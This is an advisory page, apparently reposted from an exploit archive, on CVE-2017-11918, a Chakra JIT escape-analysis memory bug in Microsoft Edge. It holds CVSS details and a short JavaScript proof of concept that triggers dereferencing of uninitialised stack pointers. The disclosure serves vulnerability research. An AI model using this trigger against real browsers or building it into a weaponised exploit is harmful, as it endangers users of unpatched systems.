Microsoft Edge Chakra JIT Escape Analysis Bug

2018.01.09

Credit: Google Security Research

Risk: High

Local: No

Remote: Yes

CVE: CVE-2017-11918

CWE: CWE-119

CVSS Base Score: 7.6/10

Impact Subscore: 10/10

Exploitability Subscore: 4.9/10

Exploit range: Remote

Attack complexity: High

Authentication: No required

Confidentiality impact: Complete

Integrity impact: Complete

Availability impact: Complete

/*
Escape analysis: https://en.wikipedia.org/wiki/Escape_analysis
Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.
PoC:
*/
function opt() {
let tmp = [];
tmp[0] = tmp;
return tmp[0];
}
function main() {
for (let i = 0; i < 0x1000; i++) {
opt();
}
print(opt()); // deref uninitialized stack pointers!
}
main();

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Microsoft Edge Chakra JIT Escape Analysis Bug

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.